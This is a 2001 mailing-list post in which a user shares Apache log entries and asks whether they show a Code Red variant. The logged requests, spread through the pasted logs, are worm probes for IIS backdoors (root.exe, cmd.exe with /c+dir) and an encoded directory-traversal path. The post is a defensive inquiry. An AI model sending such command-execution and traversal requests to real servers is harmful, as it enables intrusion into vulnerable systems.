|
I got these in my apache logs:
209.67.254.107 - - [18/Sep/2001:21:26:07 +0800]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
209.67.254.107 - - [18/Sep/2001:21:26:08 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286 209.67.254.107 - - [18/Sep/2001:21:26:18 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 210.118.61.41 - - [18/Sep/2001:22:54:35 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288 210.118.61.41 - - [18/Sep/2001:22:55:26 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286 198.147.38.145 - - [18/Sep/2001:23:03:19 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288 198.147.38.145 - - [18/Sep/2001:23:03:43 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286 165.189.168.140 - - [19/Sep/2001:00:14:39 +0800]
"GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288
165.246.31.164 - - [19/Sep/2001:00:33:40 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288 165.246.31.164 - - [19/Sep/2001:00:33:41 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 288 165.246.31.164 - - [19/Sep/2001:00:33:41 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286 165.246.31.164 - - [19/Sep/2001:00:33:44 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 165.246.31.164 - - [19/Sep/2001:00:33:46 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 286 165.246.31.164 - - [19/Sep/2001:00:33:48 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 165.246.31.164 - - [19/Sep/2001:00:33:49 +0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 296 165.246.31.164 - - [19/Sep/2001:00:33:51 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 310 It started just yesterday Sept. 18, 2001, and
continues to do so till now. The source IP address varies but with the same
activity.
Is this a variant of Code Red? Is this another
threat? What should be done?
|
- Re: [plug] [OT]: Access_logs, Probably security brea... Mark Hernandez
- Re: [plug] [OT]: Access_logs, Probably security... Rafael 'Dido' Sevilla
